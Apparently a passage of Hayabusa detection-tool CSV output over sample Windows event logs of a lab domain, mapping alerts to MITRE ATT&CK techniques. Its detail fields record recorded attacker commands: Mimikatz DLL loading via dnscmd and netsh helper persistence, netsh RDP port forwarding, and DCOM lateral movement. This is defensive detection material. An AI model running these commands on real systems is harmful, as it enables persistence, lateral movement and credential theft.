0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-18 21:18:40.607 +00:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:18:40.607 +00:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:23:27.038 +00:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:23:27.038 +00:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:30:17.318 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-18 21:30:17.318 
+00:00,rootdc1.offsec.lan,4688,high,Evas,DNS ServerLevelPluginDll Install,,rules/sigma/process_creation_builtin/proc_creation_win_dns_serverlevelplugindll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-18 21:30:17.318 +00:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-18 21:33:49.548 +00:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-18 21:33:49.548 +00:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 12:49:31.863 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:46.875 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:46.876 
+00:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:46.876 +00:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:52.315 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:52.315 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:53.378 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:53.378 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.043 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.043 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.662 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.662 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.945 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 
0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.945 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-21 20:43:07.153 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:07.153 +00:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:18.227 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:22.562 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP 
Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:49.345 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:50.131 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:50.607 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:50.866 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 21:56:57.685 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-22 21:57:11.842 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-22 21:57:11.842 +00:00,fs01.offsec.lan,4688,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 13:02:27.149 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:27.149 +00:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:27.155 +00:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:27.155 +00:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC 
Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.726 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.726 +00:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.734 +00:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.734 +00:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.373 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.375 +00:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named 
Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.379 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.379 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.380 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 20:24:46.570 +00:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-26 20:24:46.570 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos 
Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 19:30:47.965 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:47.966 +00:00,jump01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:47.966 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:48.169 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:48.170 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:48.172 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-06-01 14:06:34.542 +00:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 14:08:21.225 +00:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 14:09:38.437 +00:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \Microsoft\SynchronizeTimeZone | Content: 2021-06-01T16:09:38.3707854 OFFSEC\admmig \Microsoft\SynchronizeTimeZone 2021-06-01T16:09:35.8747701 true 1 LeastPrivilege OFFSEC\admmig InteractiveToken IgnoreNew true true true false false PT10M PT1H true false true true false false false P3D 7 adf | User: admmig | LID: 
0x46b7b4",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-03 12:17:56.988 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:17:58.582 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:17:58.582 +00:00,fs01.offsec.lan,4688,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_builtin/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:17:58.582 +00:00,fs01.offsec.lan,4688,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation_builtin/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:04.312 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 
0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:04.312 +00:00,fs01.offsec.lan,4688,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_builtin/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:06.940 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:12.941 +00:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:12.942 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 13:05:20.242 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:05:40.097 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:05:40.098 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:05:59.812 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.124 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.125 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock 